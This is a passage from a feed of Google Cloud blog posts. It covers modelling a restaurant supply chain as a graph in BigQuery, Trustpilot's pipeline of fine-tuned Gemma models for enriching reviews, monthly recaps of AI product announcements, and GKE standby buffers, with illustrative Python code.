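        parents.setdefault(child, []).append(parent)

    seen = set()
    queue = deque([start])
    while queue:
        node = queue.popleft()
        for parent in parents.get(node, []):
            if parent not in seen:
                seen.add(parent)
                queue.append(parent)
    return seen


# Everything downstream of the recalled ingredient, in a stable order.
for node in sorted(affected_downstream(EDGES, "romaine@supplier")):
    print(node)
```

The house salad at store 40 never appears in the result, because no path connects it to the recalled romaine. That is the "surgical" part: only connected items are flagged.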

2. Executing the search

Graph queries give modelers and data scientists a more natural way to express questions that span multiple data domains, because the query mirrors how the problem is described: as entities and the relationships between them. To investigate a specific complaint or risk, you run a search on the model using graph query language. For example, to find every location that handles chicken, you could run the following graph query:

Graph Query Language

    # Navigate to the source of a specific ingredient issue
    GRAPH restaurant.bombod
    MATCH (a:itemlocation)-[c:consists_of]->(b:itemlocation)
    WHERE b.itemKey LIKE '%Chicken%'
    RETURN to_json([to_json(a), to_json(c), to_json(b)]) AS result

Source of a foul odor - modeled as a graph
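
For readers new to graph pattern matching, the following Python sketch mimics what the one-hop pattern in the query above selects. It is only an analogy over in-memory data. The rows are invented, the `locationKey` column and the `match_consists_of` helper are assumptions, and `itemKey`, `bomKey`, `childItemLocation`, and `parentItemLocation` are taken from the graph definition.

```python
# Hypothetical rows standing in for restaurant.itemlocation and restaurant.bom.
ITEM_LOCATIONS = {
    "il-1": {"itemKey": "Chicken Breast", "locationKey": "dc-east"},
    "il-2": {"itemKey": "Grilled Chicken Wrap", "locationKey": "store-12"},
    "il-3": {"itemKey": "Tortilla", "locationKey": "store-12"},
    "il-4": {"itemKey": "Caesar Salad", "locationKey": "store-40"},
    "il-5": {"itemKey": "Romaine", "locationKey": "dc-east"},
}
BOM_EDGES = [
    {"bomKey": "b-1", "childItemLocation": "il-1", "parentItemLocation": "il-2"},
    {"bomKey": "b-2", "childItemLocation": "il-3", "parentItemLocation": "il-2"},
    {"bomKey": "b-3", "childItemLocation": "il-5", "parentItemLocation": "il-4"},
]


def match_consists_of(nodes, edges, needle):
    """One-hop match: (a)-[c:consists_of]->(b) where b.itemKey contains `needle`."""
    results = []
    for c in edges:
        a = nodes[c["childItemLocation"]]   # edge source
        b = nodes[c["parentItemLocation"]]  # edge destination
        if needle in b["itemKey"]:          # case-sensitive substring test
            results.append((a, c, b))
    return results


matches = match_consists_of(ITEM_LOCATIONS, BOM_EDGES, "Chicken")
locations = sorted(
    {loc for a, _, b in matches for loc in (a["locationKey"], b["locationKey"])}
)
print(locations)
```

Each result is an (a, c, b) triple, which corresponds to the JSON array the query returns per match.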

Building for the future

To get the most out of your digital twin, follow these guiding principles:

Focus on structure: Use graphs for relationships and dependencies; keep daily sales totals in relational tables.
Clean your keys: Spend time on data engineering; a graph is only as strong as its connections.
Capture edge properties: Store metadata like lead times or shipping costs directly on the edges to increase the model's utility.
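
As a rough illustration of why edge properties matter, the sketch below stores a lead time on each edge and uses it to compute the slowest upstream path into a menu item. The data, the property names (`lead_time_days`, `shipping_cost`), and the `longest_lead_time` helper are hypothetical, and the graph is assumed to be acyclic.

```python
# Hypothetical edges: (child, parent, properties stored on the edge).
EDGES = [
    ("chicken@supplier", "chicken@dc-east", {"lead_time_days": 3, "shipping_cost": 120.0}),
    ("chicken@dc-east", "chicken-wrap@store-12", {"lead_time_days": 1, "shipping_cost": 15.0}),
    ("tortilla@supplier", "chicken-wrap@store-12", {"lead_time_days": 2, "shipping_cost": 8.0}),
]


def longest_lead_time(edges, target):
    """Longest cumulative lead time (days) over all upstream paths into `target`.

    Assumes the graph has no cycles.
    """
    incoming = {}
    for child, parent, props in edges:
        incoming.setdefault(parent, []).append((child, props["lead_time_days"]))

    def walk(node):
        # A node with no incoming edges contributes zero days.
        return max(
            (days + walk(child) for child, days in incoming.get(node, [])),
            default=0,
        )

    return walk(target)


print(longest_lead_time(EDGES, "chicken-wrap@store-12"))
```

Without the property on the edge, answering the same question would mean joining back to a separate logistics table for every hop.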

Conclusion

The restaurant industry has outgrown the relational way of treating business data only as a list. By building inter-domain relationships as a digital twin with BigQuery Graph, you move from reactive problem solving to proactive modeling. It’s time to stop managing your network with a list and start seeing the connections in seconds.

Get started today

Check out the tutorial here
Visit the BigQuery documentation: find overview and quickstart guide.
Share your feedback: join our community, and get your questions answered via bq-graph-preview-support@google.com.
Related blog: Introducing BigQuery Graph

How Trustpilot built a real-time architecture for data enrichment using Gemma

Mon, 01 Jun 2026 16:00:00 +0000

Processing millions of user reviews in real-time, under strict latency and cost constraints, is no easy task. Trustpilot has been doing exactly that with custom machine learning since long before large language models (LLMs) were cool. Now, as the company transitions its core stack to generative AI, here is a look at how we teamed up to build a high-volume streaming pipeline using fine-tuned Gemma models.

Powering deep review intelligence at scale

Trustpilot’s core business relies on delivering deep, actionable review intelligence. As a platform championing transparency and genuine feedback, it must safeguard data integrity and maximize value. This means extracting every drop of metadata from incoming reviews — making LLMs the perfect tool for the job.

These models excel at parsing messy, human-written text to run named entity recognition (NER), categorize business domains, score sentiment, and pinpoint customer intent. But while prompting an LLM for a few reviews is easy, processing millions in real-time without blowing up costs is a massive engineering hurdle.

Why fine-tune an open model?

For a task this large, why not simply plug into a powerful, off-the-shelf frontier model like Gemini? For a pipeline this critical to the core business, closed models are rarely the best option. Instead, by fine-tuning open-weight models like Gemma, Trustpilot takes full ownership of its AI strategy. Here’s how:

Total model independence: By owning its models, Trustpilot ensures it controls the retraining lifecycle, completely freeing it from a third-party vendor's update schedule or sudden API changes.
Predictable economics: Shifting from a variable per-token pricing model to fixed infrastructure costs makes running millions of predictions financially viable and optimizable.
Expanding MLOps capabilities: Building these models in-house enables Trustpilot to bake in the "secret sauce" of its review intelligence while building competencies on open-weight models.
Architectural continuity: Standardizing on an open-weight lineage preserves the company’s ability to leverage the future iterations of the base model. This enables performance gains with minimal engineering overhead.

Rather than deploying one massive model, Trustpilot built a suite of highly specialized models using the lightweight google/gemma-2-9b as a base.

To get heavy-weight performance from a small footprint, the company employed a consensus annotation over a stratified sample of the Trustpilot review corpus, using a selection of teacher models from the Gemini 2.0/2.5 Pro/Flash family. This process generated high quality training datasets for specialized tasks like topic classification, NER, and sentiment extraction.

The datasets were subsequently used to fine-tune a targeted lineup of custom models that considerably outperformed the legacy solution and delivered accuracy just a couple of percentage points lower than the teacher models’ consensus.
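
The post does not spell out how consensus was computed, so the following is only one plausible reading: a majority vote across teacher outputs, keeping a training example only when enough teachers agree. The `consensus_label` helper, the two-thirds threshold, and the sample votes are all assumptions made for illustration.

```python
from collections import Counter


def consensus_label(votes, min_agreement=2 / 3):
    """Return the majority label if enough teachers agree, otherwise None."""
    if not votes:
        return None
    label, count = Counter(votes).most_common(1)[0]
    return label if count / len(votes) >= min_agreement else None


# Hypothetical sentiment labels from three teacher models per review.
TEACHER_OUTPUTS = {
    "review-1": ["positive", "positive", "positive"],
    "review-2": ["negative", "neutral", "negative"],
    "review-3": ["positive", "neutral", "negative"],
}

# Keep only reviews where the teachers reached consensus.
training_set = {}
for review_id, votes in TEACHER_OUTPUTS.items():
    label = consensus_label(votes)
    if label is not None:
        training_set[review_id] = label

print(training_set)
```

Dropping the reviews without agreement trades dataset size for label quality, which tends to matter more when the student model is small.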

System architecture

This architecture was built on top of Dataflow and Gemini Enterprise Agent Platform Endpoints, which play together very nicely because of the out-of-the-box VertexAIModelHandlerJSON.

We decoupled business logic and raw LLM inference by creating two separate endpoints:

The classifier: a FastAPI-based endpoint that handles the messy stuff, pre/post-processing, prompt templating, and chaining.
The LLM: A separate Agent Platform endpoint dedicated strictly to serving the Gemma model via vLLM.

This approach keeps the Dataflow job clean and ensures the LLM endpoint sticks to what it does best: generating text. Plus, it allows Trustpilot to scale them independently based on the traffic.
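
The split between the two endpoints can be sketched in a few lines of Python. This is not Trustpilot's code: the prompt template, the label set, and the `classify_review` function are hypothetical, and the LLM endpoint is represented by an injected `generate` callable so the business logic can be exercised without a model.

```python
import json

# Hypothetical prompt template owned by the classifier service.
PROMPT_TEMPLATE = (
    "Classify the sentiment of this review as positive, neutral, or negative.\n"
    'Answer with JSON like {{"sentiment": "..."}}.\n'
    "Review: {text}"
)
ALLOWED = {"positive", "neutral", "negative"}


def classify_review(text, generate):
    """Classifier-side logic: template the prompt, call the LLM, validate the reply.

    `generate` is any callable mapping a prompt string to raw model text. In
    production it would wrap a request to the separate LLM endpoint.
    """
    prompt = PROMPT_TEMPLATE.format(text=text.strip())
    raw = generate(prompt)
    try:
        sentiment = json.loads(raw).get("sentiment")
    except (json.JSONDecodeError, AttributeError):
        sentiment = None
    if isinstance(sentiment, str) and sentiment in ALLOWED:
        return {"sentiment": sentiment}
    return {"sentiment": "unknown"}


def fake_llm(prompt):
    """Stand-in for the LLM endpoint, used here only for demonstration."""
    return '{"sentiment": "positive"}'


print(classify_review("  Great service, fast delivery!  ", fake_llm))
```

Because the model call is just a parameter, the pre- and post-processing can be tested and deployed on CPU-only infrastructure while the GPU-backed endpoint scales on its own.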

Performance tuning

To get the most out of the vLLM-based Agent Platform endpoints, Trustpilot focused on squeezing every bit of performance out of the entire pipeline, especially from the A2 VMs using A100 GPUs. It also leveraged the customized and optimized version of vLLM maintained by Gemini Enterprise Agent Platform.

A focus of our performance tuning involved optimizing the vLLM backend configuration to prevent processing bottlenecks. By carefully adjusting the engine parameters, selecting the appropriate data type, and enabling useful settings such as prefix caching, we ensured the models could smoothly handle high streaming volumes.
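
The post does not list the exact settings used, so the sketch below only shows the kind of knobs involved. The flag names are from open-source vLLM, and the customized vLLM on Agent Platform may expose them differently. Every value is an illustrative assumption, not a recommendation, and `to_cli_args` is a hypothetical helper.

```python
# Illustrative values only; flag names follow open-source vLLM.
VLLM_SETTINGS = {
    "model": "google/gemma-2-9b",    # base model named in the post
    "dtype": "bfloat16",             # data type for weights and activations
    "max-model-len": 4096,           # cap on context length
    "max-num-seqs": 128,             # cap on sequences batched per step
    "gpu-memory-utilization": 0.9,   # fraction of GPU memory vLLM may use
    "enable-prefix-caching": True,   # reuse KV cache for shared prompt prefixes
}


def to_cli_args(settings):
    """Turn a settings dict into a flat list of command-line arguments."""
    args = []
    for key, value in settings.items():
        if value is True:
            args.append(f"--{key}")            # boolean switch
        elif value is not False and value is not None:
            args.extend([f"--{key}", str(value)])
    return args


print(" ".join(to_cli_args(VLLM_SETTINGS)))
```

Prefix caching is a natural fit for this workload, since every request to a given task model is likely to share the same instruction prefix and differ only in the review text.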

Together, we also created a reusable load testing framework to find the optimal serving capacity for a vLLM inference server and to sketch its performance profile. This made it possible to set a baseline for the required infrastructure and to tune the autoscaling setup using the request-count-based metric. A metric based on the number of requests waiting in vLLM could be an even better autoscaling signal.
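
The framework itself is not shown in the post. As a hedged sketch of the final step, the code below takes a measured performance profile for one replica, picks the best operating point under a latency target, and derives a replica count for peak traffic. All numbers, the 70% utilization target, and both helper functions are hypothetical.

```python
import math

# Hypothetical load-test results for one replica:
# (concurrent requests, throughput in requests/s, p95 latency in seconds).
PROFILE = [
    (4, 3.8, 1.1),
    (8, 7.1, 1.3),
    (16, 12.4, 1.9),
    (32, 14.0, 3.6),
    (64, 14.2, 7.5),
]


def best_operating_point(profile, p95_slo_s):
    """Highest-throughput measurement whose p95 latency stays within the SLO."""
    within_slo = [row for row in profile if row[2] <= p95_slo_s]
    if not within_slo:
        raise ValueError("no measured load level meets the latency SLO")
    return max(within_slo, key=lambda row: row[1])


def replicas_needed(peak_rps, per_replica_rps, target_utilization=0.7):
    """Replica count that serves peak traffic while keeping some headroom."""
    return math.ceil(peak_rps / (per_replica_rps * target_utilization))


concurrency, rps, p95 = best_operating_point(PROFILE, p95_slo_s=2.0)
print(concurrency, rps, replicas_needed(peak_rps=100, per_replica_rps=rps))
```

In this made-up profile, throughput flattens beyond 16 concurrent requests while latency keeps climbing, which is the saturation pattern a load test is meant to expose before autoscaling thresholds are set.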

Challenges

While building this setup, Trustpilot encountered a few notable hurdles:

Private networking: The architecture aimed to be fully isolated by using private endpoints and Private Service Connect, but this wasn’t possible because there was no native support for direct private communication between distinct endpoints.
Deployment observability and reliability: Endpoint deployments can be slow or opaque, so extra troubleshooting is occasionally needed when an endpoint enters an unhealthy state. Trustpilot is still working closely with the Gemini Enterprise Agent Platform product team to help shape future observability features and platforms.
GPU scarcity: Securing A100 GPUs in the EU region is tough, so on-demand VMs are often a no-go. Reservations are preferable, but balancing them between development, production, training, inference, and experiments can be quite challenging.

The results

Together with Google Cloud, Trustpilot leveraged the full potential of Gemma on Gemini Enterprise Agent Platform to process millions of reviews a day in near real-time. In doing so, they achieved Gemini-like performance for a fraction of the cost. This ultimately allowed the Trustpilot Business Platform to turn millions of everyday customer reviews into instant, actionable insights. You can read more on the Trustpilot Medium blog post.

This blog post was written by Assulan Nurkas (Trustpilot), Subu Ramasubramanian (Trustpilot), Konrad Stanek (Trustpilot), Dario Banfi (Google) and Michael Cohen Hjertén (Google) based on the work done during the joint project at the end of 2025.

What Google Cloud announced in AI this month

Mon, 01 Jun 2026 16:00:00 +0000

Editor’s note: Want to keep up with the latest from Google Cloud? Check back here for a monthly recap of our latest updates, announcements, resources, events, learning opportunities, and more.

We’ve had a busy month! Between announcing Gemini Spark and Gemini 3.5 at Google I/O and unveiling Google AI Threat Defense, our latest AI-powered cybersecurity solution, we had a lot to share with Google Cloud customers. Keeping up with the latest news takes time, so we gathered the most important announcements, thought leadership, and technical guides in one place to help you quickly catch up.

To learn more about our I/O announcements, here’s everything you need to know for Google Cloud customers, and top news for startups.

Top announcements

Introducing Google AI Threat Defense to help you outpace the adversary: Google Cloud is introducing a comprehensive AI-powered cybersecurity solution — Google AI Threat Defense — an always-on autonomous security platform. Learn more here.

Gemini 3.5: Our latest family of models combines frontier intelligence with action – starting with Gemini 3.5 Flash.
Gemini Omni: Our new model is a leap forward in world understanding, multimodality, and editing, letting you generate any output from any input, starting with video.
Google Antigravity: Google Antigravity’s expanded capabilities and new integration with Agent Platform bring agentic development to your entire organization.
Gemini Spark: For Gemini Enterprise and Workspace customers, Gemini Spark is your 24/7 personal AI agent that helps you work more efficiently by autonomously taking action on your behalf, under your direction.
Google Workspace: Google Pics, our new image generation and editing tool, and new voice features in Gmail, Docs and Keep, help reimagine how you work.
Managed Agents API on Agent Platform: Allows developers to build and run custom agents inside secure, Google-hosted environments that seamlessly integrate with Agent Platform.
CodeMender: A powerful AI security agent provided through Agent Platform, CodeMender can help find and fix vulnerabilities in your code.

Nano Banana 2 and Nano Banana Pro are generally available: Available today via Gemini Enterprise Agent Platform, organizations are already putting the models to work. Learn more here.

Thought leadership (editor’s pick):

Cloud CISO Perspectives: How Google + Wiz changes multicloud strategy for CISOs: Vinod D’Souza, director, Office of the CISO, shares highlights from his RSA Conference fireside chat with Anthony Belfiore, chief strategy officer, Wiz. While threat actors have seen gains from the adversarial misuse of AI, Google and Wiz are tackling these challenges head-on by combining Wiz's deep cloud telemetry with Google's world-class AI and quantum research to help CISOs and their organizations meet the needs of the agentic enterprise era. Read more here.

News you can use:

What Google I/O '26 means for developing agents on Google Cloud: Dig into how Gemini Enterprise Agent Platform and the new developer tools shared at I/O fit together, explore the spectrum of choices for building, and see what we’d actually try first. Learn more here.

Five must-have guides to move agents into production with Gemini Enterprise Agent Platform: Here is a look back at our five-part series covering the architecture patterns and best practices you need to move your agents into production. Learn more here.
How to build an AI-ready security program for the public sector: From industrial control systems to decades-old municipal databases, here’s our CISO guidance to prep AI-ready security programs for the public sector. Learn more here.

Stay tuned for monthly updates on Google Cloud’s AI announcements, news, and best practices. For a deeper dive into the latest from Google Cloud customers, read our monthly recap, Cool stuff customers built.

April

We hosted Google Cloud Next in Las Vegas on April 22, announcing incredible innovations from Gemini Enterprise Agent Platform to our eighth-generation TPUs. We also expanded the Gemini Enterprise app in collaborative ways – now, with new features like Projects, you can work side-by-side with your agents and colleagues.

If you missed the livestream, take a look at our Day 1 recap. It’s been incredible to see how customers have been applying AI in thousands of ways — so far, we’ve counted more than 1,300 examples.

Top announcements

1. Gemini Enterprise Agent Platform: Our new, comprehensive platform to build, scale, govern, and optimize agents. Moving forward, all Vertex AI services and roadmap evolutions will be delivered exclusively through the Agent Platform, rather than as a standalone service, to power the next generation of agent development.

The platform is designed around four core pillars — build, scale, govern, and optimize — that allow teams to collaborate seamlessly. Learn more about Agent Platform here.

2. Gemini Enterprise app has all the key components to let teams discover, create, share, and run AI agents in a single environment. At Next ‘26, we introduced several new capabilities in the Gemini Enterprise app:

Agent Designer uses the same no-code agent designer experience of Agent Platform and lets employees build sophisticated schedule- and trigger-based agents using any enterprise connector. It gives you a virtual flowchart of your agent, allowing you to inspect, test, and approve workflows, ensuring total transparency for executing critical business processes.
Long-running agents are designed to execute complex business processes. They can work autonomously in secure cloud sandboxes, giving agents the ability to orchestrate business logic, write code to build custom tools, and complete multi-step work like reconciliation activities or sales prospect sequencing — without needing constant prompting.
Inbox in Gemini Enterprise provides a central location to monitor, guide, and help manage all of your agent activity, including your long-running agents. Notifications are intuitively categorized into actionable groups like "Needs your input," "Errors," and "Completed."
Projects create a dedicated space where the agent’s memory is confined to the files and conversations your team adds. By connecting it to data sources including Google Drive, NotebookLM, and Google Group Chats, the agent becomes an expert on a specific topic and can provide team members daily briefings or status updates without digging through months of documents.
Skills create simple shortcuts using an “@” mention for repetitive tasks such as applying brand guidelines, formatting a report, and accessing specific data.
Canvas gives our customers an interactive editor directly within Gemini Enterprise. It allows teams to easily create and edit Docs and Slides, and even export to Microsoft 365 files, within the same experience.
Agent Gallery provides access to third-party agents from partners like Adobe, Atlassian, Lovable, and ServiceNow, and is adding more third-party connectors for Asana, Mailchimp, Workday, and more. These integrations enable your agents to retrieve data and execute tasks with your systems-of-record.

3. AI Hypercomputer: Designed specifically for demanding AI workloads, our AI Hypercomputer is an advanced, purpose-built architecture that unites performance-optimized hardware for compute, storage, networking, open software and machine learning frameworks — as well as flexible consumption models — into a single, integrated system. We are announcing innovations at every layer of the AI Hypercomputer:

TPU 8t, optimized for training, uses breakthrough Inter-Chip Interconnect (ICI) technology to scale up to 9,600 TPUs and 2 PB of shared, high-bandwidth memory in a single superpod. It achieves 3x the processing power of Ironwood and delivers up to 2x more performance/Watt.
TPU 8i, optimized for inference, uses our new Boardfly topology to directly connect 1,152 TPUs in a single pod. It features 3x more on-chip SRAM compared to previous versions to host larger KV caches entirely on-silicon and integrates a specialized Collectives Acceleration Engine. Taken together, TPU 8i delivers 80% better performance per dollar for inference than the prior generation, enabling millions of concurrent agents to run cost-effectively.

4. The Agentic Data Cloud: A new data architecture built for the speed and scale of agentic AI. The Agentic Data Cloud delivers an AI-native architecture, allowing agents to perceive, reason, and act on your behalf in real-time, including:

Cross-Cloud Lakehouse, standardized on Apache Iceberg, is our Lakehouse that enables you to leave your data in AWS or Azure (coming later this year) while querying it instantly, without the friction of vendor lock-in or the cost of data movement.
Knowledge Catalog constructs a unified, dynamic context graph of your entire business enabling you to ground agents in all of your business data and semantics. With Smart Storage and the Object Context API, files in Google Cloud Storage are instantly tagged and enriched with metadata before an agent touches them. Then our Knowledge Engine uses Gemini to autonomously tag, define logic and instantly map complex relationships across your entire enterprise, providing the semantic definition your agents have been missing.

5. Protecting the agentic enterprise: Security built for the AI era. Our full-stack AI approach, from the chips to the models, gives you a competitive advantage with better integration and velocity to help protect customers. Not only can Google act on insights from the world’s largest threat observatory and Mandiant frontline experts, but we also bring cutting-edge insights and breakthroughs from Google DeepMind to help make your platforms more secure.

Agentic defense: Three new agents in Google Security Operations can help hunt threats, engineer detections, and provide context on third parties. You can build your own security agents with remote Google Cloud model context protocol (MCP) server support for Google Security Operations, now generally available. You can also access the MCP server client directly from the Google Security Operations chat interface, available in preview.
Protecting AI and cloud apps across any infrastructure with Wiz: Newly expanded AI coverage helps build secure agents across clouds and AI studios. New AI-Bill of Materials in development tools can help secure AI-generated code and mitigate the risk of shadow AI. Learn more.
Securing agents and the agentic web: Model Armor can integrate with Agent Gateway, and new Agent Identities provide more layers of defense against shadow AI. Google Cloud Fraud Defense, the next evolution of reCAPTCHA, offers agent-specific capabilities that can help secure the agentic web as well as the entire user and customer journey.
Trusted Cloud: We’re simplifying permissions with modern IAM, and advancing Google Cloud security with new capabilities in Security Command Center plus new innovations in data and network security.
New partner-supported workflows for Google Security Operations: This new robust cohort of partner integrations includes partners developing their own agentic security operations centers (SOCs).

You can catch up on all our security announcements from Next ‘26 here.

News you can use

Guide to prompting Gemini 3.1 Flash TTS (text-to-speech): The new TTS model introduces a high level of controllability by allowing you to steer the delivery using more than 200 audio tags. We'll share how to get strong results from the model, whether you are building accessible gaming soundtracks, banking systems, or audiobooks. Learn more about the model here.
Ultimate prompting guide for Lyria 3 models: Lyria 3, Google's family of music-generation models, is designed to give you granular control over vocals, instrumentation, and arrangement. So we spent weeks testing against every musical genre and use case we could imagine. We put together this guide to share exactly what we learned and how you can get the best results.
How to find the sweet spot between cost and performance: This guide will walk you through Google Cloud's flexible gen AI infrastructure options, showing you how to find that sweet spot on the efficient frontier between cost and performance. We'll start with the foundational pay-as-you-go (PayGo) models and then explore how to layer on more specialized options to build a robust and cost-effective gen AI strategy.
Essential AI and cloud security now on by default: To support the next generation of AI innovators, we now offer essential AI security and cloud security, on by default, in Security Command Center Standard.
Securing AI inference on GKE with Model Armor: Here’s how to secure AI inference on Google Kubernetes Engine with Model Armor and high-performance storage.
Cloud CISO Perspectives: AI, security, and the workforce of the future: You can’t bring traditional security to an AI fight, so how do we defend against AI-powered attacks, boost defenders with AI, and secure AI use? Drop in on this RSA Conference fireside chat between Francis deSouza, Google Cloud COO and President, Security Products, and Nick Godfrey, senior director, Office of the CISO.

March

March was a busy month for our AI teams. We launched Gemini Embedding 2, rolled out a highly cost-effective Veo 3.1 Lite model, and officially welcomed the Wiz team to Google Cloud to help redefine security in the AI era.

Alongside these launches, we created comprehensive guides to help you get the most out of these models, from prompting formulas for Nano Banana 2, to practical advice for optimizing your TPU training. Here’s a quick look at the latest news and resources to help your team build what’s next.

Top hits:

Gemini Embedding 2: Our first natively multimodal embedding model: Gemini Embedding 2 is our first natively multimodal embedding model that maps text, images, video, audio and documents into a single embedding space, enabling multimodal retrieval and classification across different types of media — and it’s available now in public preview.
Build with Veo 3.1 Lite, our most cost-effective video generation model: This model empowers developers to build high-volume video applications, at less than 50% of the cost of Veo 3.1 Fast, but with the same speed. This rounds out the Veo 3.1 model family, giving developers flexibility based on needs. For Cloud customers, it’s now available on Vertex AI.

Here’s a fun bonus: Check out our ultimate prompting guide for Veo 3.1 to get started.

Welcoming Wiz to Google Cloud: Redefining security for the AI era: Google has completed its acquisition of Wiz, a leading cloud and AI security platform. The Wiz team will join Google Cloud, and we will retain the Wiz brand. With the addition of Wiz, we will provide customers with a comprehensive platform to secure their cloud and hybrid environments, as well as accelerate threat prevention, detection, and response.
Gemini 3.1 Flash Live: Making audio AI more natural and reliable: We’ve improved 3.1 Flash Live’s overall quality, making it more reliable for developers and enterprises to build voice-first agents that can complete complex tasks at scale. On ComplexFuncBench Audio, a benchmark that captures multi-step function calling with various constraints, it leads with a score of 90.8% compared to our previous model.

News you can use:

The ultimate Nano Banana prompting guide: This is a must-read for anyone working with Nano Banana. We spent weeks testing Nano Banana 2 and Nano Banana Pro against every use case we could imagine to test its limits. We put together this guide to share exactly what we learned and how you can get the best results. Here’s an example formula: [Reference images] + [Relationship instruction] + [New scenario]

A developer’s guide to training with Ironwood TPUs: In this guide, we hear from Lillian Yu, CPA, CA, Product Strategy and Operation, and Liat Berry, Product Manager, on five strategies within the JAX and MaxText ecosystems designed to help developers refine training efficiency and hit peak performance on Ironwood hardware.
How to build production-ready AI agents with Google-managed MCP servers: In this guide, we anchor on a specific example. Cityscape is a demo agent built with Google's Agent Development Kit (ADK) that turns a simple text prompt, like "Generate a cityscape for Kyoto," into a unique, AI-generated city image. Check out the guide to learn more.

February

In February, we’re giving developers more reasoning power with Gemini 3.1 Pro and Claude 4.6, and faster creative scaling with Nano Banana 2. We’re also opening up new training programs and step-by-step guides to help you tackle the hardest parts of the AI lifecycle, from capacity planning to mounting defenses against AI-powered attacks.

Here’s a rundown of our latest news, tools, and resources to help you build what’s next.

Top hits

Pro-level image generation gets faster and more accessible with Nano Banana 2: To build creative that stands out, you need models that naturally integrate into your workflows and scale with ease. Check out our blog to see how this comes to life (and how customers are putting the model to work).

Introducing Gemini 3.1 Pro on Google Cloud: Gemini 3.1 Pro is a clear step forward in reasoning, designed to solve tougher problems, giving you the reasoning depth your business needs. Gemini 3.1 Pro is available starting today in preview in Vertex AI and Gemini Enterprise. Developers can access the model in preview via the Gemini API in Google AI Studio, Android Studio, Google Antigravity, and Gemini CLI.
Announcing Claude Opus 4.6 and Claude Sonnet 4.6 on Vertex AI: Now generally available on Vertex AI, explore our sample notebook to get started and visit our documentation for comprehensive pricing and regional availability details.
New AI threats report: Distillation, experimentation, and integration: John Hultquist, chief analyst, Google Threat Intelligence Group, details what security leaders should know from our newest AI threat report on experimentation, integration, and distillation attacks.

News you can use

A developer's guide to production-ready AI agents: To help developers work through these challenges, we've published a collection of guides covering the full agent lifecycle. These resources first appeared during Kaggle’s 5 days of AI Agents Intensive, and they’ve proven so popular and useful, we wanted to make sure a wider audience had access, as well.
Gemini Enterprise Agent Ready (GEAR) program now available: We opened the Gemini Enterprise Agent Ready (GEAR) learning program to everyone. As a new specialized pathway within the Google Developer Program, GEAR empowers developers and pros to build and deploy enterprise-grade agents with Google AI.
Your guide to Provisioned Throughput (PT) on Vertex AI: Check out this deep-dive blog designed to show you the resources available to you today on Vertex AI, and how you can get started capacity planning.
How AI can boost defenders, from defense in depth to the cyber kill chain (Q&A): We know that defenders are also developing powerful AI tools. What’s still unknown is what it could mean for enterprise software ownership if companies have to constantly mount AI-directed defenses against AI-powered attacks.

January

We used to have to learn the language of computers. In 2026, they’re learning ours.

We kicked off the year by exploring the future of agentic commerce, where AI agents navigate the web to find and buy products for us. Our leaders call this the "invisible shelf" — a world where commerce isn't tied to a specific website. To make this reality scalable, we announced the Universal Commerce Protocol (UCP), a shared language that allows agents and retailers to understand each other.

We brought that same fluency to our creative and technical tools:

Updates to Veo 3.1 allow creators to use simple inputs — like reference images — to generate precise, mobile-ready video.
Natural language queries: With Comments to SQL in BigQuery, we’re removing the language barrier to data. Engineers can now write queries by describing their intent in natural language, prioritizing the question over the code.

Let’s dive in.

Top hits

1. Gemini Enterprise for Customer Experience (CX): Specifically built for agentic retail, this platform transforms fragmented search, commerce and service touch points into one seamless journey — whether you need a shopping assistant, a support bot, agentic search or help with merchandising.

2. We announced Universal Commerce Protocol (UCP): A new open standard for agentic commerce that works across the entire shopping journey — from discovery and buying to post-purchase support. UCP establishes a common language for agents and systems to operate together across consumer surfaces, businesses and payment providers. So instead of requiring unique connections for every individual agent, UCP enables all agents to interact easily. UCP is built to work across verticals and is compatible with existing industry protocols like Agent2Agent (A2A), Agent Payments Protocol (AP2) and Model Context Protocol (MCP).

3. We updated Veo 3.1, including improvements to Ingredients to Video and Portrait mode: Veo is getting more expressive, with improvements that help you create more fun, creative, high-quality videos based on ingredient images, built directly for the mobile format. This includes:

Improvements to Veo 3.1 Ingredients to Video, our capability that lets you create videos based on reference images.
Native vertical outputs for Ingredients to Video (portrait mode) to power mobile-first, short-form video creation.
State-of-the-art upscaling to 1080p and 4K resolution for high-fidelity production workflows.

These updates are launching in the Gemini app, YouTube, Flow, Google Vids, the Gemini API and Vertex AI.

4. Vibe querying with comments-to-SQL: Crafting complex SQL queries can be challenging. Often, engineers simply want to express their data needs in plain English directly within their SQL workflow. That’s why we’re introducing Comments to SQL in BigQuery. This feature makes writing queries using natural language – ‘vibe querying’ – a reality. Learn more in the blog.

News you can use

Mastering Gemini CLI: Your complete guide from installation to advanced use-cases: We’ve teamed up with DeepLearning.ai and are excited to announce a free course – Gemini CLI: Code & Create with an Open-Source Agent. This course isn’t just for developers; we dive into practical use cases for various tasks such as data analysis, content creation, and personalized learning.
How Google SREs use Gemini CLI to solve real-world outages: In this article, we’ll delve into real scenarios that Google SREs are solving today using Gemini 3 (our latest foundation model) and Gemini CLI—the go-to tool for bringing agentic capabilities to the terminal.
Getting started with Gemini 3: Deploy your first Gemini 3 app to Google Cloud Run: In this blog, we will show you how to vibe code your first app, which uses the Gemini 3 Flash Preview model, and deploy it at a publicly accessible URL on Google Cloud Run. Google AI Studio lets you go from idea to app quickly by using natural language to generate fully functional apps using the power of Gemini 3.
Practical guidance: Building with the Secure AI Framework (SAIF) on Google Cloud: We know that security and data privacy are the top concerns for executives when evaluating AI providers, and security is the top use case for AI agents in a majority of industries. To help you build AI boldly and responsibly, here’s our guide to developing AI with the Secure AI Framework (SAIF) on Google Cloud.
The truths about AI hacking that every CISO needs to know (Q&A): How will AI boost threat actors? And what can chief information security officers do about it? Google’s Heather Adkins, vice-president, Security Engineering, explores how securing the enterprise is about to change.

Introducing the GKE standby buffer: Improve node startup times without blowing your budget

Mon, 01 Jun 2026 16:00:00 +0000

Application owners and platform engineers have long faced a difficult choice: spend excessively by over-provisioning to guarantee quick startups, or minimize costs but endure slow cold starts.

We are excited to announce a solution to this compromise: Google Kubernetes Engine standby buffers. This builds on the launch of GKE active buffers earlier this year, a native version of the Kubernetes CapacityBuffers API that makes it easy to provision readily available capacity to handle traffic spikes, delivering near-zero startup latency for new pods. However, active buffers still impose a trade-off between performance and cost. New GKE standby buffers help by maintaining a low-cost, suspended capacity buffer for your GKE clusters. With a cost overhead in the low single-digit percent, GKE standby buffers help you achieve near-immediate scheduling for your workloads. This is useful for all kinds of workloads: general-purpose, agentic, and everything in between.

